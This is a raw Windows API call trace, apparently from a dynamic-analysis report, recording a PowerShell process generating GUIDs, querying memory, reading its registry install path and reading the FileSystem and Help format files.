	[0093.885] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x471255bd, Data2=0x3d6f, Data3=0x44b3, Data4=([0]=0xb5, [1]=0xee, [2]=0x7b, [3]=0xde, [4]=0xc0, [5]=0x85, [6]=0xbd, [7]=0xfb))) returned 0x0
	[0093.885] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc7e7ebaf, Data2=0x3858, Data3=0x4c87, Data4=([0]=0x83, [1]=0xbf, [2]=0x23, [3]=0x3e, [4]=0xf7, [5]=0x77, [6]=0xcc, [7]=0x83))) returned 0x0
	[0093.885] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x904de5b0, Data2=0xc61e, Data3=0x4a46, Data4=([0]=0x82, [1]=0xeb, [2]=0x2d, [3]=0xf, [4]=0x31, [5]=0x17, [6]=0xd3, [7]=0x19))) returned 0x0
	[0093.886] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x6aca0874, Data2=0xcf95, Data3=0x48f5, Data4=([0]=0xa0, [1]=0x20, [2]=0x7c, [3]=0x4a, [4]=0xa6, [5]=0x21, [6]=0xb3, [7]=0x20))) returned 0x0
	[0093.886] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xf6abfcd2, Data2=0xf19, Data3=0x460e, Data4=([0]=0xa7, [1]=0xa7, [2]=0x56, [3]=0x4a, [4]=0xba, [5]=0x22, [6]=0x73, [7]=0xea))) returned 0x0
	[0093.887] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x63ec0317, Data2=0x3079, Data3=0x4a4a, Data4=([0]=0x82, [1]=0x29, [2]=0xb2, [3]=0x58, [4]=0x46, [5]=0x71, [6]=0x6d, [7]=0x71))) returned 0x0
	[0093.887] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3ea5e5f5, Data2=0x6afb, Data3=0x47ea, Data4=([0]=0xb1, [1]=0xeb, [2]=0xd0, [3]=0xf9, [4]=0xeb, [5]=0x14, [6]=0x42, [7]=0x8b))) returned 0x0
	[0093.888] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xea75b78c, Data2=0xca34, Data3=0x41da, Data4=([0]=0x80, [1]=0x2f, [2]=0x45, [3]=0x80, [4]=0xd2, [5]=0x76, [6]=0x25, [7]=0x6c))) returned 0x0
	[0093.888] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x13de847f, Data2=0x1ba2, Data3=0x45c7, Data4=([0]=0x8e, [1]=0x3b, [2]=0x4b, [3]=0x1c, [4]=0xe9, [5]=0xe9, [6]=0x12, [7]=0xe6))) returned 0x0
	[0093.889] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xbc66b732, Data2=0xff8a, Data3=0x44c5, Data4=([0]=0x96, [1]=0x66, [2]=0xf, [3]=0x3e, [4]=0xbf, [5]=0xf8, [6]=0x93, [7]=0xca))) returned 0x0
	[0093.889] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xa738f192, Data2=0x8af, Data3=0x4b1a, Data4=([0]=0xb5, [1]=0x89, [2]=0x4a, [3]=0x57, [4]=0xf0, [5]=0xbf, [6]=0xf8, [7]=0x49))) returned 0x0
	[0093.890] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x97837b91, Data2=0x62a0, Data3=0x4cb8, Data4=([0]=0x84, [1]=0xcc, [2]=0x38, [3]=0xa8, [4]=0x19, [5]=0x64, [6]=0xd0, [7]=0x7d))) returned 0x0
	[0093.890] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc4f29d41, Data2=0x5206, Data3=0x4e9a, Data4=([0]=0x9a, [1]=0xc2, [2]=0xb2, [3]=0xf7, [4]=0xec, [5]=0x80, [6]=0x8e, [7]=0x78))) returned 0x0
	[0093.891] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x7f14dbfc, Data2=0x311c, Data3=0x4e89, Data4=([0]=0xae, [1]=0x12, [2]=0xc9, [3]=0x42, [4]=0x45, [5]=0xb9, [6]=0x72, [7]=0x77))) returned 0x0
	[0093.891] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.892] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.895] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.898] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc0552569, Data2=0x3f48, Data3=0x4fc6, Data4=([0]=0x9b, [1]=0x5a, [2]=0xd5, [3]=0xf1, [4]=0x32, [5]=0xc8, [6]=0x87, [7]=0x87))) returned 0x0
	[0093.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0093.899] SetErrorMode (uMode=0x1) returned 0x1
	[0093.899] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0093.900] GetFileType (hFile=0x338) returned 0x1
	[0093.900] SetErrorMode (uMode=0x1) returned 0x1
	[0093.900] GetFileType (hFile=0x338) returned 0x1
	[0093.900] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.902] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.902] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.902] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.904] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.904] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.904] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x119, lpOverlapped=0x0) returned 1
	[0093.904] ReadFile (in: hFile=0x338, lpBuffer=0x3696858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3696858*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0093.905] CloseHandle (hObject=0x338) returned 1
	[0093.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0093.905] SetErrorMode (uMode=0x1) returned 0x1
	[0093.905] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0093.905] SetErrorMode (uMode=0x1) returned 0x1
	[0093.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0093.906] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x338) returned 0x0
	[0093.906] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0093.906] CoTaskMemAlloc (cb=0x5a) returned 0x2ed880
	[0093.906] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x2ed880, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0093.906] CoTaskMemFree (pv=0x2ed880) 
	[0093.906] RegCloseKey (hKey=0x338) returned 0x0
	[0093.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0093.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0093.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.910] VirtualQuery (in: lpAddress=0x16bf80, lpBuffer=0x16ce40, dwLength=0x30 | out: lpBuffer=0x16ce40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.910] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x84a1940, Data2=0x7736, Data3=0x4239, Data4=([0]=0x88, [1]=0x9c, [2]=0x87, [3]=0x9c, [4]=0x94, [5]=0xc4, [6]=0xdb, [7]=0x5c))) returned 0x0
	[0093.911] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.912] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x4f02eae3, Data2=0x71f0, Data3=0x45a9, Data4=([0]=0x9a, [1]=0xb9, [2]=0x6f, [3]=0xdc, [4]=0x8c, [5]=0x15, [6]=0xca, [7]=0x0))) returned 0x0
	[0093.912] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x8431ffb0, Data2=0xd462, Data3=0x4a39, Data4=([0]=0x95, [1]=0x7f, [2]=0xe9, [3]=0x15, [4]=0x5d, [5]=0x59, [6]=0x64, [7]=0xc8))) returned 0x0
	[0093.913] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb1b6f244, Data2=0x249a, Data3=0x4920, Data4=([0]=0x8d, [1]=0xf4, [2]=0x29, [3]=0x51, [4]=0xc6, [5]=0xaa, [6]=0x5f, [7]=0x96))) returned 0x0
	[0093.913] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.914] VirtualQuery (in: lpAddress=0x16c0c0, lpBuffer=0x16cf80, dwLength=0x30 | out: lpBuffer=0x16cf80*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0093.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0093.915] SetErrorMode (uMode=0x1) returned 0x1
	[0093.915] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0093.915] GetFileType (hFile=0x338) returned 0x1
	[0093.915] SetErrorMode (uMode=0x1) returned 0x1
	[0093.915] GetFileType (hFile=0x338) returned 0x1
	[0093.915] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.917] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.918] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.918] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.919] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.920] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.920] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.920] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.921] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.922] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.922] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.922] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.923] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.923] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.923] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.924] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.926] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.926] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.927] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.927] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.927] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.928] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.928] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.982] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.983] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.983] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.983] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.984] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.984] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.984] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.985] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.985] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.989] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.989] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.990] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.990] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.990] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.991] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.991] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.991] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.992] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.992] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
